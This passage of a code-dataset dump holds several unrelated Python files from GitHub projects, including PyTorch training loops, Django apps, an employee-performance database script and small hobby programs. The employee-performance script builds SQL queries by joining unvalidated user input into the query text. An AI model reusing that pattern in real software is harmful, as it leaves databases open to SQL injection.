with open(csv_file_path,'w',newline='') as csvfile:\n csv_writer = csv.writer(csvfile)\n csv_head = ['name','image_id','confidence','xmin','ymin','xmax','ymax']\n csv_writer.writerow(csv_head)\n\n for i, (image,label,image_ids) in enumerate(train_loader):\n # batch\n if self.cuda_gpu:\n image = image.cuda()\n label = label.cuda()\n output = model(image)\n else:\n image = image\n label = label\n output = model(image)\n loss = self.loss(output=output, label= label)\n output = output.cpu()\n losses.update(float(loss.data.item()), image.size(0))\n optimizer.zero_grad()\n loss.backward()\n\n for p in model.parameters():\n if p.grad is not None:\n p.grad.data.clamp_(-self.grid_clip_by_value, self.grid_clip_by_value)\n\n optimizer.step()\n if i % 100 == 0:\n print('finish training image',image_ids)\n self.write_det_csv(image_ids, csv_writer=csv_writer, output=output)\n\n # close the csv file to read the csv file\n csvfile.close()\n return csv_file_path, losses.avg\n\n\n\n\n def save_checkpoints(self, epoch):\n model = self.model\n if self.save and epoch % self.save_freq == 0 :\n torch.save(self.model.state_dict(), self.dir_dict['save_dir'] + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + str(\"%06d\" % epoch) +'.pth')\n elif epoch == self.epochs:\n torch.save(model.state_dict(), self.dir_dict['save_dir'] + datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + str(\"%06d\" % epoch) +'.pth')\n\n\n\n\n def get_confidence(self,class_i_image,bbox):\n confidences = []\n mask = class_i_image[bbox[0]:bbox[2],bbox[1]:bbox[3]]\n # 取像素中置信度最高为最终的置信度\n confidence = np.max(np.max(mask))\n return confidence\n\n def validate_epoch(self, epoch):\n val_loader, model = self.val_dataloader, self.model\n model.eval()\n losses = AverageMeter()\n # detection result\n csv_file_path = self.dir_dict['csv_dir'] +'/'+ datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S') + \\\n '_val_' + str(\"%06d\" % epoch) + '.csv'\n with open(csv_file_path,'w') as CSVfile:\n csv_writer = csv.writer(CSVfile)\n csv_head = ['name', 'image_id', 'confidence', 'xmin', 'ymin', 'xmax', 'ymax']\n csv_writer.writerow(csv_head)\n for i,(image,label,image_ids) in enumerate(val_loader):\n if self.cuda_gpu:\n image = image.cuda()\n label = label.cuda()\n output = model(image)\n else:\n image = image\n label = label\n output = model(image)\n loss = self.loss(output,label)\n output = output.cpu()\n losses.update(float(loss.data.item()),image.size(0))\n if i % 100 == 0:\n print('finish validating image',image_ids)\n self.write_det_csv(image_ids, csv_writer=csv_writer, output= output)\n CSVfile.close()\n\n return csv_file_path, losses.avg\n\n\n\n\n\n\n def write_det_csv(self,image_ids,csv_writer,output):\n for b in range(list(image_ids.size())[0]):\n # 处理单个batch中sample data\n image_id = image_ids[b].numpy()\n output_b = output[b, :, :, :]\n for j in range(1, self.n_classes):\n # 处理sample data中的单个通道(class)\n class_j_image = output_b[j, :, :]\n csv_content = self.get_bbox(class_j_image, j, image_id,csv_writer=csv_writer)\n\n\n def get_bbox(self, class_i_image, class_i, image_id,csv_writer):\n\n csv_content = []\n\n class_i_image_numpy = class_i_image.detach().numpy()\n binary_image = np.where(class_i_image_numpy >= self.confidence_threshold, 1, 0)\n # 连通域分析\n # mask to bbox\n # 效果不太好\n lbl = measure.label(binary_image)\n props = measure.regionprops(lbl)\n # bbox x_min,y_min,x_max,y_max\n for prop in props:\n bbox = prop.bbox\n confidence = self.get_confidence(class_i_image_numpy, bbox)\n csv_writer.writerow([class_dict_reverse[class_i], str(\"%06d\" % (image_id+1))+'.xml', confidence, bbox[0], bbox[1], bbox[2], bbox[3]])\n\n\n\n def adjust_learning_rate(self, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 after args.lr_decay_step steps\"\"\"\n lr = self.learning_rate * (0.1 ** (epoch // self.lr_decay_step))\n for param_group in self.optimizer.param_groups:\n param_group['lr'] = lr\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\n\n\n\n\n\n","repo_name":"YangHai-1218/optical_comp_exercise","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24125117693","text":"import re\n\nfrom django.db.models.signals import m2m_changed, post_save, pre_delete\nfrom django.dispatch import receiver\nfrom django.urls import reverse\n\nfrom .models import Entry, Notification, User\n\n\n@receiver(post_save, sender=Entry)\ndef entry_notification(sender, instance, created, **kwargs):\n \"\"\"\n Signal used to create notification(s) when an entry is created\n This function notifies an user if this entry is a reply to him.\n This function notifies an user if he's mentioned (by @username) in one's entry\n \"\"\"\n if created:\n # First find usernames mentioned (by @ tag)\n p = re.compile(r\"^(@)(\\w+)$\")\n usernames = set(\n [\n p.match(c).group(2).lower()\n for c in instance.content.split()\n if p.match(c)\n ]\n )\n # Remove the author of an entry from users to notify\n if instance.user.username in usernames:\n usernames.remove(instance.user.username)\n # If entry has a parent and it's parent is not the same author then notify about a reply\n # and delete from usernames if being notified\n if instance.parent and instance.parent.user.username != instance.user.username:\n if instance.parent.user.username in usernames:\n usernames.remove(instance.parent.user.username)\n Notification.objects.create(\n type=\"user_replied\",\n sender=instance.user,\n target=instance.parent.user,\n object=instance,\n )\n # Notify mentioned users without the author of an entry\n for name in usernames:\n if name == instance.user.username:\n continue\n try:\n target = User.objects.get(username=name)\n except Exception:\n continue\n Notification.objects.create(\n type=\"user_mentioned\",\n sender=instance.user,\n target=target,\n object=instance,\n )\n\n\n@receiver(m2m_changed, sender=Entry.tags.through)\ndef entry_tag_notification(instance, action, **kwargs):\n \"\"\"\n Notifies users if one of the tags in entry is observed by them.\n \"\"\"\n if not instance.modified_date and \"post\" in action:\n already_notified = set()\n reversed_user = reverse(\n \"user-detail-view\", kwargs={\"username\": instance.user.username}\n )\n reversed_entry = reverse(\"entry-detail-view\", kwargs={\"pk\": instance.pk})\n all_tags = instance.tags.all().prefetch_related(\"observers\", \"blacklisters\")\n all_blacklisters = [\n blacklister for tag in all_tags for blacklister in tag.blacklisters.all()\n ]\n to_create = []\n for tag in all_tags:\n for observer in tag.observers.all():\n # If user blacklisted one of the tags in an entry, don't notify him.\n if observer in all_blacklisters:\n continue\n if (\n observer.username == instance.user.username\n or observer in already_notified\n ):\n continue\n reversed_tag = reverse(\"tag\", kwargs={\"tag\": tag.name})\n content = (\n f'{instance.user.username} used tag #{tag.name}'\n f' in \"{instance.content:.25}...\"'\n )\n to_create.append(\n Notification(\n type=\"tag_used\",\n sender=instance.user,\n target=observer,\n object=instance,\n content=content,\n )\n )\n already_notified.add(observer)\n Notification.objects.bulk_create(to_create)\n","repo_name":"piotr-kopacki/bloggy","sub_path":"app/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"12001583524","text":"from tabulate import tabulate\n\ndef update_performance(mydb, id):\n mycursor = mydb.cursor()\n print()\n print('---Update Performance----')\n print('Employees Under me:')\n mycursor.execute('SELECT employee_id, name from employee_personal_info WHERE manager_id = ' + str(id))\n data = mycursor.fetchall()\n result =[]\n for x in data:\n result.append([x[0], x[1]])\n print(tabulate(result, headers=['Employee Id', 'Name']))\n print(\"Enter Employee ID: \")\n emp_id = input()\n mycursor.execute(\n 'SELECT * from employee_personal_info WHERE employee_id = ' + str(emp_id) + ' and manager_id = ' + str(id))\n data = mycursor.fetchall()\n\n if (len(data) == 0):\n print(\"Invalid Employee ID\")\n\n else:\n mycursor.execute('SELECT * from Employee_Performance WHERE id = ' + str(emp_id));\n performance_data = mycursor.fetchall()\n\n print(\"Tasks Completed: \" + str(performance_data[0][1]))\n print(\"Backlogs: \" + str(performance_data[0][2]))\n print(\"Communication Skills: \" + str(performance_data[0][3]))\n print(\"Output Quality: \" + str(performance_data[0][4]))\n print(\"Analytic Skills: \" + str(performance_data[0][5]))\n\n print()\n print(\"Update Tasks Completed (-1 for no change): \")\n new_task = input()\n if (new_task == '-1'):\n new_task = str(performance_data[0][1])\n\n print(\"Update Backlogs (-1 for no change): \")\n new_backs = input()\n if (new_backs == '-1'):\n new_backs = str(performance_data[0][2])\n\n print(\"Update Communication Skills (-1 for no change): \")\n new_comm = input()\n if (new_comm == '-1'):\n new_comm = str(performance_data[0][3])\n\n print(\"Update Output Quality (-1 for no change): \")\n new_qual = input()\n if (new_qual == '-1'):\n new_qual = str(performance_data[0][4])\n\n print(\"Update Analytic Skills (-1 for no change): \")\n new_skill = input()\n if (new_skill == '-1'):\n new_skill = str(performance_data[0][5])\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET task_complete = ' + str(new_task) + ' WHERE id = ' + str(emp_id))\n mydb.commit()\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET backlogs = ' + str(new_backs) + ' WHERE id = ' + str(emp_id))\n mydb.commit()\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET comm_skill = ' + str(new_comm) + ' WHERE id = ' + str(emp_id))\n mydb.commit()\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET output_quality = ' + str(new_qual) + ' WHERE id = ' + str(emp_id))\n mydb.commit()\n\n mycursor.execute(\n 'UPDATE Employee_Performance SET analytic_skill = ' + str(new_skill) + ' WHERE id = ' + str(\n emp_id))\n mydb.commit()\n print('Update Done')\n mycursor.close()\n return\n\n","repo_name":"anushika99/Employee_Management_system_database_project","sub_path":"Update_employee_performance.py","file_name":"Update_employee_performance.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"19148865175","text":"import numpy as np\nimport matplotlib.pyplot as plt\nM = [0.052, 0.124, 0.168, 0.236, 0.284, 0.336] #y\nfi = [0.1745, 0.3491, 0.5236, 0.6981, 0.8727, 1.0472] #x\n\nxy = []\nfor i in range(6):\n xy.append(M[i]*fi[i])\n\nx2 = []\nfor i in range(6):\n x2.append(fi[i]**2)\n\ny2 = []\nfor i in range(6):\n y2.append(M[i]**2)\n\na = np.average(xy)/np.average(x2)\ndevi = np.sqrt(1/6*(np.average(y2)/np.average(x2) - a**2))\n\nprint(\"modul torzije: {} +/- {}\".format(a, devi))\n\nplt.plot(fi, M, '*')\ny = []\nfor i in range(6):\n y.append(fi[i]*a)\nplt.plot(fi, y)\nplt.show()","repo_name":"IrisButigan/PAF","sub_path":"Vjezbe/Vjezbe_3/linregress.py","file_name":"linregress.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8043638733","text":"from data import question_data\nfrom question_model import Question\nfrom quiz_brain import QuizBrain\nquestion_bank=[]\nfor i in range(len(question_data)):\n question_bank.append(Question(question_data[i]['question'], question_data[i]['correct_answer']))\n #print(question_bank[i].text)\n #print(question_bank[i].answer)\nquiz = QuizBrain(question_bank)\nwhile quiz.still_has_questions():\n quiz.show_question()\n\nprint(\"The quiz has ended\")\nprint(f\"Yor final score is: {quiz.score}/{quiz.question_number}\")\n","repo_name":"joelorellana/PythonBootCamp","sub_path":"DAY017/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20782765882","text":"import os\nfrom time import sleep\nfrom examples import cg_md, ind, rmd\n\nclass construtor:\n \n def __init__(self, pwd):\n dir = {}\n dir['src'] = 'src'\n dir['tests'] = 'tests'\n dir['docs'] = 'docs'\n dir['abs'] = pwd #os.getcwd() \n\n file = {}\n file['1'] = '/__init__.py'\n file['2'] = '/module1.py'\n file['3'] = '/module2.py'\n\n test_file1 = '/test_module1.py'\n test_file2 = '/test_module2.py'\n\n docs_file1 = '/index.md'\n docs_file2 = '/user_guide.md'\n docs_file3 = '/contribution_guide.md'\n\n\n dir_src = os.path.join(dir['abs'], dir['src'])\n dir_tests = os.path.join(dir['abs'], dir['tests'])\n dir_docs = os.path.join(dir['abs'], dir['docs'])\n\n if not os.path.exists(dir_src):\n os.makedirs(dir_src)\n file = open(dir_src + file['1'], \"w\")\n sleep(1)\n file = open(dir_src + file['2'], \"w\")\n sleep(1)\n file = open(dir_src + file['3'], \"w\")\n sleep(1)\n file.close()\n print('Diretório SRC criado com sucesso! ')\n\n else:\n print(f'Ja existe o diretório {dir[\"src\"]} ')\n \n if not os.path.exists(dir_tests):\n os.makedirs(dir_tests)\n file = open(dir_tests + test_file1, 'w')\n file = open(dir_tests + test_file2, \"w\")\n print('Diretório TESTS criado com sucesso! ')\n \n else:\n print(f'Ja existe o diretório {dir[\"tests\"]} ')\n \n if not os.path.exists(dir_docs):\n os.makedirs(dir_docs)\n file = open(dir_docs + docs_file1, 'w')\n file.write(ind)\n file = open(dir_docs + docs_file2, \"w\")\n file = open(dir_docs + docs_file3, \"w\")\n file.write(cg_md)\n print('Diretório DOCS criado com sucesso! ')\n file.close()\n else:\n print(f'Ja existe o diretório {dir[\"docs\"]} ')\n\n if not os.path.exists(dir['abs']+'/README.md'):\n file = open(dir['abs'] + '/README.md', \"w\")\n file.write(rmd)\n else:\n print('Arquivo README.md já existe no diretório!')\n \n if not os.path.exists(dir['abs']+ '/requirements.txt'):\n file = open(dir['abs'] + '/requirements.txt', \"w\")\n else:\n print('Arquivo requirements.txt já existe no diretório!')\n\ntry:\n pwd = str(input('Digite o diretório do projeto: ').strip()) \nexcept KeyboardInterrupt:\n\n print('Cancelado pelo usuário') \ntry:\n if __name__==\"__main__\":\n construtor(pwd)\nexcept NameError:\n pass","repo_name":"eusouanderson/construtor","sub_path":"construtor.py","file_name":"construtor.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18902466558","text":"import turtle\nimport random\n\nt = turtle.Turtle()\nt.up()\nt.goto(-100,100)\nt.down()\nt.speed(0)\n\n# race field\nfor i in range(15):\n t.write(i)\n t.right(90)\n t.fd(200)\n t.up()\n t.bk(200)\n t.left(90)\n t.down()\n t.fd(20)\n\n# On your marks...\n#first racer\nr1 = turtle.Turtle()\nr1.up()\nr1.shape(\"turtle\")\nr1.color(\"red\")\nr1.goto(-120,70)\nr1.down()\n#second racer\nr2 = turtle.Turtle()\nr2.up()\nr2.shape(\"turtle\")\nr2.color(\"blue\")\nr2.goto(-120,40)\nr2.down()\n#third racer\nr3 = turtle.Turtle()\nr3.up()\nr3.shape(\"turtle\")\nr3.color(\"yellow\")\nr3.goto(-120,10)\nr3.down()\n#Add the fans\ngoto = -120\nnumber = random.randint(1,10)\nfor i in range(number):\n rf = random.randint(0,255)\n gf = random.randint(0,255)\n bf = random.randint(0,255)\n goto = goto + 30\n fan = turtle.Turtle()\n fan.shape(\"turtle\")\n fan.up()\n fan.color(rf, gf, bf)\n fan.goto(goto,-120)\n fan.left(90)\n#guessing\nwin = input (\"Which turtle will win:\")\ntext = turtle.Turtle()\ntext.up()\ntext.goto(-120,120)\ntext.write(\"You think that the winner will be \" + win)\n#go!\nr1_dist = 0\nr2_dist = 0\nr3_dist = 0\nwhile True:\n if r1_dist >= 305:\n text.clear()\n text.write(\"And the winner of this race is red!\")\n break\n elif r2_dist >= 305:\n text.clear()\n text.write(\"And the winner of this race is blue!\")\n break\n elif r3_dist >= 305:\n text.clear()\n text.write(\"And the winner of this race is yellow!\")\n break\n else:\n r1m = random.randint(1,5)\n r2m = random.randint(1,5)\n r3m = random.randint(1,5)\n r1_dist = r1_dist + r1m\n r2_dist = r2_dist + r2m\n r3_dist = r3_dist + r3m\n r1.fd(r1m)\n r2.fd(r2m)\n r3.fd(r3m)\n\n","repo_name":"renzo-spiteri/kodland-python-course","sub_path":"Turtle Race/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"108996758","text":"import json\nimport logging\nimport imaplib\nimport time\nimport email\nimport subprocess\nimport shlex\nimport shared_variables_mc\n\nfrom mex_master_controller.MexOperation import MexOperation\n\nlogger = logging.getLogger(__name__)\n\n\nclass Role(MexOperation):\n def __init__(self, root_url, prov_stack=None, token=None, super_token=None, thread_queue=None):\n super().__init__(root_url=root_url, prov_stack=prov_stack, token=token, super_token=super_token, thread_queue=thread_queue)\n\n #self.create_url = '/usercreate'\n #self.delete_url = '/auth/user/delete'\n self.showuser_url = '/auth/role/showuser'\n self.showperms_url = '/auth/role/perms/show'\n #self.update_url = '/auth/user/update'\n #self.update_restricted_url = '/auth/restricted/user/update'\n\n# def _build(self, username=None, password=None, email_address=None, metadata=None, locked=None, family_name=None, given_name=None, nickname=None, enable_totp=None, role=None, organization=None, use_defaults=True):\n# if username == 'default':\n# username = shared_variables_mc.username_default\n# \n# if use_defaults:\n# if username is None: username = shared_variables_mc.username_default\n# if password is None: password = shared_variables_mc.password_default\n# if email_address is None: email_address = username + '@email.com'\n#\n# shared_variables_mc.username_default = username\n# shared_variables_mc.password_default = password\n#\n# user_dict = {}\n#\n# if username is not None:\n# user_dict['name'] = username\n# if password is not None:\n# user_dict['passhash'] = password\n# if email_address is not None:\n# user_dict['email'] = email_address\n# if metadata is not None:\n# user_dict['metadata'] = metadata\n# if locked is not None:\n# user_dict['locked'] = locked\n# if family_name is not None:\n# user_dict['familyname'] = family_name\n# if given_name is not None:\n# user_dict['givenname'] = given_name\n# if nickname is not None:\n# user_dict['nickname'] = nickname\n# if enable_totp is not None:\n# user_dict['enabletotp'] = enable_totp\n# if role is not None:\n# user_dict['role'] = role\n# if organization is not None:\n# user_dict['orginaztion'] = organization \n#\n# return user_dict\n\n def role_show(self, token=None, role=None, organization=None, json_data=None, use_defaults=True, use_thread=False):\n msg_dict = {}\n\n return_show = self.show(token=token, url=self.showuser_url, json_data=json_data, use_defaults=use_defaults, use_thread=use_thread, message=msg_dict)\n return_list = []\n \n if role:\n for user in return_show:\n if user['role'] == role:\n return_list.append(user)\n\n elif organization:\n for user in return_show:\n if user['org'] == organization:\n return_list.append(user)\n\n else:\n return_list = return_show\n\n return return_list\n\n def role_perms(self, token=None, role=None, json_data=None, use_defaults=True, use_thread=False):\n msg_dict = {}\n\n return_show = self.show(token=token, url=self.showperms_url, json_data=json_data, use_defaults=use_defaults, use_thread=use_thread, message=msg_dict)\n return_list = []\n\n if role:\n for user in return_show:\n if user['role'] == role:\n return_list.append(user)\n else:\n return_list = return_show\n\n return return_list\n\n\n","repo_name":"mobiledgex/edge-cloud-qa","sub_path":"modules/mex_master_controller/Role.py","file_name":"Role.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"3460005160","text":"import os\nimport cv2\n\ndef resize_image(image, new_height):\n height, width, _ = image.shape\n new_width = int(width * (new_height / height))\n return cv2.resize(image, (new_width, new_height))\n\ndef images_to_video(image_folders, output_video_path, duration_per_frame=2):\n num_folders = len(image_folders)\n image_files = [sorted([f for f in os.listdir(folder) if f.lower().endswith(('.png', '.jpg', '.jpeg', '.gif'))]) for folder in image_folders]\n \n if not all(image_files):\n print(\"Image files not found in one or more folders.\")\n return\n \n num_images_per_folder = [len(files) for files in image_files]\n \n if len(set(num_images_per_folder)) != 1:\n print(\"All folders must contain the same number of image files.\")\n return\n \n frame_rate = 1 / duration_per_frame\n images = [cv2.imread(os.path.join(image_folders[i], image_files[i][0])) for i in range(num_folders)]\n max_height = max(image.shape[0] for image in images)\n images = [resize_image(image, max_height) for image in images]\n total_width = sum(image.shape[1] for image in images)\n video_writer = cv2.VideoWriter(output_video_path, cv2.VideoWriter_fourcc(*'mp4v'), frame_rate, (total_width, max_height))\n\n for img_set in zip(*image_files):\n frame_images = []\n for i, img_name in enumerate(img_set):\n image = cv2.imread(os.path.join(image_folders[i], img_name))\n image = resize_image(image, max_height)\n frame_images.append(image)\n \n combined_frame = cv2.hconcat(frame_images)\n\n for _ in range(int(duration_per_frame * frame_rate)):\n video_writer.write(combined_frame)\n\n video_writer.release()\n print(\"Video creation completed successfully.\")\n\nif __name__ == \"__main__\":\n script_name = \"persam_f/\"\n img_cat_name = \"pizza2\"\n image_folders = [\n \"/home/cgv/Personalize-SAM/outputs/\" + script_name + img_cat_name + \"/bad\", \n \"/home/cgv/Personalize-SAM/outputs/\" + script_name + img_cat_name + \"/vis/bad\", \n ]\n output_video = \"/home/cgv/Personalize-SAM/outputs/video/\" + script_name + img_cat_name + \".mp4\"\n images_to_video(image_folders, output_video)\n","repo_name":"Rickyeeeeee/MyPerSAM","sub_path":"utils/image2video.py","file_name":"image2video.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37836903199","text":"\nfrom django.shortcuts import render, HttpResponse, redirect\nfrom django.contrib import messages\nfrom .models import *\nimport bcrypt\n\n\ndef register(request):\n errors = User.objects.basic_validator(request.POST)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/')\n else:\n password = request.POST['password']\n print(password)\n password_confirm = request.POST['password_confirm']\n pw_hash = bcrypt.hashpw(password.encode(), bcrypt.gensalt()) \n pw_hash_confirm = bcrypt.hashpw(password_confirm.encode(), bcrypt.gensalt()) \n print(pw_hash)\n User.objects.create(first_name=request.POST['first_name'], last_name=request.POST['last_name'], password=pw_hash, password_confirm=pw_hash_confirm, \n email=request.POST['email'], birth_date=request.POST['birth_date']) \n print(\"its working\")\n\n return redirect(\"/book\")\n \ndef login(request):\n if not User.objects.loginValid(request):\n return redirect('/')\n else:\n theuser = User.objects.filter(email=request.POST['email']) \n if theuser: \n logged_user = theuser[0] \n request.session['userid'] = logged_user.id\n return redirect('/book')\n return redirect('/')\n\ndef index(request):\n if request.session.get(\"userid\"):\n return redirect(\"/book\")\n return render(request,\"FavBooksApp/index.html\")\n\ndef presuccess(request):\n uid = request.session.get(\"userid\")\n if not uid:\n return redirect(\"/\")\n context = {\n \"thisuser\" : User.objects.get(id=uid),\n \"allbooks\" : Book.objects.all(),\n \"this_user\" : User.objects.get(id=uid)\n\n\n \n }\n return render(request,\"FavBooksApp/success.html\",context)\n\ndef logout(request):\n del request.session['userid'] \n return redirect(\"/\")\n\n################^^^^^^^^^^^THE ABOVE CODE IS FOR REGISTRATION AND LOGIN^^^^^^^^^^^^######################\n\ndef addingbook(request):\n errors = User.objects.book_add_valid(request)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/book')\n else:\n if request.session.get(\"userid\"):\n this_user_session_id= request.session.get(\"userid\")\n print(this_user_session_id)\n this_user_obj= User.objects.get(id= this_user_session_id)\n print(this_user_obj.first_name)\n # print(for key in )\n new_book_adding = Book.objects.create(title=request.POST[\"titleName\"],desc=request.POST[\"descriptionName\"],uploaded_by = this_user_obj)\n print(new_book_adding)\n this_user = User.objects.get(id=this_user_session_id)\n print(this_user)\n new_book_adding.users_who_fav.add(this_user)\n return redirect (\"/book\")\n return render(request,\"FavBooksApp/index.html\")\n\ndef favorite(request,id):\n if request.session.get(\"userid\"):\n the_book_being_liked= id\n this_user_session_id= request.session.get(\"userid\")\n this_book = Book.objects.get(id=the_book_being_liked)\n this_user = User.objects.get(id=this_user_session_id)\n print(this_book)\n print(this_user)\n print(this_user_session_id)\n print(the_book_being_liked)\n this_book.users_who_fav.add(this_user)\n\n return redirect (\"/book\") \n return render(request,\"FavBooksApp/index.html\")\n\n\n\ndef books_page(request,id):\n if request.session.get(\"userid\"):\n the_book_being_liked= id\n this_user_session_id= request.session.get(\"userid\")\n this_book = Book.objects.get(id=the_book_being_liked)\n this_user = User.objects.get(id=this_user_session_id)\n context={\n \"book\": Book.objects.get(id=id),\n \"users\": User.objects.all(),\n \"users_header\": this_user,\n \"users_fav\":this_book.users_who_fav.all()\n }\n\n return render(request,\"FavBooksApp/books_page.html\",context)\n return render(request,\"FavBooksApp/index.html\")\n\n\ndef unfavorite(request,id):\n if request.session.get(\"userid\"):\n the_book_being_liked= id\n this_user_session_id= request.session.get(\"userid\")\n this_book = Book.objects.get(id=the_book_being_liked)\n this_user = User.objects.get(id=this_user_session_id)\n print(this_book)\n print(this_user)\n print(this_user_session_id)\n print(the_book_being_liked)\n this_book.users_who_fav.remove(this_user)\n # print(\"lets see this\")\n # the_book_being_liked= id\n # this_user_session_id= request.session.get(\"userid\")\n # the_user_final= User.objects.get(id=this_user_session_id)\n \n # print(\"lets see this\")\n # if the_user_final in users_that_fav.books_liked.all():\n # # (id=this_user_session_id):\n # print(\"KJBKJ KJNJKBKJBKJNBKJNKNKBNKJN \")\n # this_book = Book.objects.get(id=the_book_being_liked)\n # this_user = User.objects.get(id=this_user_session_id)\n # this_book.users_who_fav.remove(this_user)\n return redirect (\"/book\") \n return render(request,\"FavBooksApp/index.html\")\n\ndef editbook(request,id):\n errors = User.objects.book_add_valid(request)\n if len(errors) > 0:\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/book')\n else:\n if request.session.get(\"userid\"):\n the_book_being_edited= id\n this_book = Book.objects.get(id=the_book_being_edited)\n this_book.title = request.POST['titleName']\n this_book.desc = request.POST['descriptionName']\n this_book.save()\n\n return redirect('/book')\n return render(request,\"FavBooksApp/index.html\")\n\ndef delete(request,id):\n if request.session.get(\"userid\"):\n the_book_being_deleted= id\n this_book = Book.objects.get(id=the_book_being_deleted)\n this_book.delete()\n return redirect('/book')\n return render(request,\"FavBooksApp/index.html\")\n\n\n\ndef fav_books(request):\n if request.session.get(\"userid\"):\n this_user_session_id= request.session.get(\"userid\")\n this_user= User.objects.get(id=this_user_session_id)\n\n context={\n \"users\": this_user.books_liked.all(),\n \"this_user\": this_user\n }\n\n return render(request,\"FavBooksApp/favs.html\",context)\n return render(request,\"FavBooksApp/index.html\")\n # if request.session.get(\"userid\") == Book.objects.uploaded_by.get(id=id):\n # the_book_being_liked= id\n # this_user_session_id= request.session.get(\"userid\")\n # this_book = Book.objects.get(id=the_book_being_liked)\n # this_user = User.objects.get(id=this_user_session_id)\n # context={\n # \"book\": Book.objects.get(id=id),\n # \"users\": User.objects.all(),\n # \"users_header\": this_user,\n # \"users_fav\":this_book.users_who_fav.all()\n # }\n\n # else:\n\n\n\n\n","repo_name":"Nassertakkesh/FavBooks","sub_path":"apps/FavBooksApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"34700659101","text":"import torch\nfrom torch import nn\nimport numpy as np\n\nfrom typing import Tuple, Union, List, Callable\nfrom torch.optim import SGD\nimport torchvision\nfrom torch.utils.data import DataLoader, TensorDataset, random_split\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\n\ndef linear_model() -> nn.Module:\n \"\"\"Instantiate a linear model and send it to device.\"\"\"\n model = nn.Sequential(nn.Flatten(),nn.Linear(d, 10))\n return model.to(DEVICE)\n\ndef train(\n model: nn.Module, optimizer: SGD,\n train_loader: DataLoader, val_loader: DataLoader,\n epochs: int = 20\n)-> Tuple[List[float], List[float], List[float], List[float]]:\n \"\"\"\n Trains a model for the specified number of epochs using the loaders.\n\n Returns: \n Lists of training loss, training accuracy, validation loss, validation accuracy for each epoch.\n \"\"\"\n\n loss = nn.CrossEntropyLoss()\n train_losses = []\n train_accuracies = []\n val_losses = []\n val_accuracies = []\n for e in tqdm(range(epochs)):\n model.train()\n train_loss = 0.0\n train_acc = 0.0\n\n # Main training loop; iterate over train_loader. The loop\n # terminates when the train loader finishes iterating, which is one epoch.\n for (x_batch, labels) in train_loader:\n x_batch, labels = x_batch.to(DEVICE), labels.to(DEVICE)\n optimizer.zero_grad()\n labels_pred = model(x_batch)\n batch_loss = loss(labels_pred, labels)\n train_loss = train_loss + batch_loss.item()\n\n labels_pred_max = torch.argmax(labels_pred, 1)\n batch_acc = torch.sum(labels_pred_max == labels)\n train_acc = train_acc + batch_acc.item()\n\n batch_loss.backward()\n optimizer.step()\n train_losses.append(train_loss / len(train_loader))\n train_accuracies.append(train_acc / (B_SIZE * len(train_loader)))\n\n # Validation loop; use .no_grad() context manager to save memory.\n model.eval()\n val_loss = 0.0\n val_acc = 0.0\n\n with torch.no_grad():\n for (v_batch, labels) in val_loader:\n v_batch, labels = v_batch.to(DEVICE), labels.to(DEVICE)\n labels_pred = model(v_batch)\n v_batch_loss = loss(labels_pred, labels)\n val_loss = val_loss + v_batch_loss.item()\n\n v_pred_max = torch.argmax(labels_pred, 1)\n batch_acc = torch.sum(v_pred_max == labels)\n val_acc = val_acc + batch_acc.item()\n val_losses.append(val_loss / len(val_loader))\n val_accuracies.append(val_acc / (B_SIZE * len(val_loader)))\n\n return train_losses, train_accuracies, val_losses, val_accuracies\n\ndef parameter_search(\n train_loader: DataLoader, \n val_loader: DataLoader, \n model_fn:Callable[[], nn.Module],\n lrs: List[float] = torch.linspace(1e-6, 1e-1, 5),\n epochs: int = 20\n) -> float:\n \"\"\"\n Parameter search for our linear model using SGD.\n\n Args:\n train_loader: the train dataloader.\n val_loader: the validation dataloader.\n model_fn: a function that, when called, returns a torch.nn.Module.\n lrs: a list of learning rates to try.\n num_iter: the number of iterations to train for.\n\n Returns:\n The learning rate with the least validation loss.\n NOTE: you may need to modify this function to search over and return\n other parameters beyond learning rate.\n \"\"\"\n best_loss = torch.tensor(np.inf)\n best_lr = 0.0\n\n if lrs is None:\n lrs = torch.linspace(10 